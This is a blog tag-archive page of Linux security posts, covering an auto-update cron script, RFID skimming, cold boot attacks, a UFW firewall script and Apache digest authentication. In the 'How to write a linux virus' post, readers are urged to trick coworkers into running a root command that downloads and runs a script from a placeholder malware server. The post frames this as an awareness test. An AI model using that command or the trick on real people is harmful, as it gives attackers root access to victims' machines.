Tag Archives: security

Auto update for Debian/Ubuntu

I use the following script to automatically update my Ubuntu box.
I don’t recommend using this on your production servers!

#!/bin/bash
 
#################################################
##                                             ##
## auto-update.sh v1.0                         ##
## Use this script to set up automatic updates ##
## on your debian/ubuntu box.                  ##
##                                             ##
#################################################
 
## Creating /usr/bin/auto-update.sh file
sudo touch /usr/bin/auto-update.sh
sudo chmod 700 /usr/bin/auto-update.sh
sudo chown root:root /usr/bin/auto-update.sh
echo '#!/bin/bash' | sudo tee -a /usr/bin/auto-update.sh
echo 'touch /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo 'echo '------------------' >> /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo 'echo `date` >> /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo 'PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin' | sudo tee -a /usr/bin/auto-update.sh
echo 'export PATH' | sudo tee -a /usr/bin/auto-update.sh
echo '/usr/bin/aptitude update >> /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo '/usr/bin/aptitude -y safe-upgrade >> /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo 'exit' | sudo tee -a /usr/bin/auto-update.sh
 
# Creating a cron job for root user (it will run /usr/bin/auto-update.sh every day at 14:30)
echo '30 14 * * * /usr/bin/auto-update.sh > /dev/null' > cron_file.txt && sudo crontab -u root cron_file.txt && rm -f cron_file.txt

Note that there are some dangers regarding automatic updates. You can read more about it here.

RFID tags

RFID (Radio-frequency identification) is an automatic identification method.
RFID tags can be used in passports, transportation payments, product tracking, transportation and logistics, lap scoring, animal identification.
Human implants are also available but the experts warned against using RFID for authenticating people due to the risk of identity theft.
In the video you’ll see how RFID tags can be accesed using inexpensive off-the-shelf components.
Researcher Chris Paget built a device consisting of a Symbol XR400 RFID reader (now manufactured by Motorola), a Motorola AN400 patch antenna mounted to the side of his Volvo XC90, and a Dell 710m that’s connected to the RFID reader by ethernet cable. The laptop runs a Windows application Paget developed that continuously prompts the RFID reader to look for tags and logs the serial number each time one is detected. He bought most of the gear via auctions listed on eBay.
Watch and be scared!

httpv://www.youtube.com/watch?v=9isKnDiJNPk

How to write a linux virus

After reading an interesting article about linux “viruses” (the comments are interersing, too), I decided to raise the alarm about the source of many security related issues
in today’s computers: the user.
The author talks about the many ways to compromise a linux box, even if you are not root.
I will not get into techinal methods, you can find them on the internet or by reading the original article. Instead I will talk about the regular user.
From my experience I know for sure that a regular user could compromise his own system.
Don’t belive me? Make a little test.
1. For Windows
– rename any executable file as “virus.exe”, put it on a web server and give the link to your coworkers by email, instant messenger, whatever.
2. For Linux
– put them to open terminal and type “sudo su -” and then “wget http://www.your_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py”
You’ll be surprised by their actions. You’ll find out that many will open the link or run the commands.
For many of you this will not be a surprise. You’ll say: “I know someone who will instinctively click on the link!”.
Think about that every one of us knows a person like that.
It’s not a hard thing to make the user click on a link or run a command.
The attackers just have to find ways to extract informations from the compromised box.
In the end of the article, the author talks about solutions to this problem.

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken serious.

In conclusion, there are no bullet-proof systems, only users who are too careless and click every link in their’s mouse way.

Cold Boot Attacks on Encryption Keys

Some guys at Princeton University published the results of their attacks on popular disk encryption systems (BitLocker, FileVault, dm-crypt, and TrueCrypt) using no special devices or materials.
Find out more about their research here and here.

Sample firewall script for Hardy Heron

I just thought that you might be interested in a small script you can use in Hardy Heron.

It uses the new UFW (Uncomplicated firewall) introduced in this new Ubuntu distro.

The script is well commented, so everything is easy to understand.

Here is the script:

#!/bin/bash
 
  ## set the default policy to drop (deny) all connections
  sudo ufw default deny
 
  ## set logging ON
  sudo ufw logging on
 
  ## permit unrestricted traffic from a specific static IP address
  sudo ufw allow from 192.168.1.1    # maybe your router
 
  ## permit TCP connections on ssh port 22
  sudo ufw allow 22/tcp
 
  ## Allow Apache2
  sudo ufw allow 80/tcp
 
  ## Allow MySQL
  sudo ufw allow 3306/tcp
 
  ## Allow Bittorrent
  for port in {7881..7889};
  do sudo ufw allow $port/tcp; done
 
  ## Allow eMule
  sudo ufw allow 4662/tcp
  sudo ufw allow 4672/udp
 
  ## Allow DC++
  sudo ufw allow 6845
 
  ## Allow Samba from internal network only 
  sudo ufw allow proto tcp from 192.168.1.0/24 to any port 135 # used by smbd
  sudo ufw allow proto udp from 192.168.1.0/24 to any port 137 # used by nmbd
  sudo ufw allow proto udp from 192.168.1.0/24 to any port 138 # used by nmbd
  sudo ufw allow proto tcp from 192.168.1.0/24 to any port 139 # used by smbd
  sudo ufw allow proto tcp from 192.168.1.0/24 to any port 445 # used by smbd
 
  ## Display rules
  sudo ufw status

You can modify it by adding/removing rules accordingly.

Enabling Authentication with apache

Enabling Authentication

There is actually 2 different ways of getting authenticated with apache.

– Basic Authentication: password is passed from client to server in plain text across the network;
– Digest Authentication: password is transmitted as a MD5 digest which is more secure.

In order to avoid to have our password transmitted as clear text, we are going to use the Digest Authentication.
This kind of authentication actually relies on an apache module which is not enable by default: auth_digest.
To enable it, simply run:
sudo a2enmod auth_digest
Now that apache can handle Digest Authentication, we need to set up a user/password/realm using:
htdigest -c /var/www/munin/.htpasswd munin foo

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close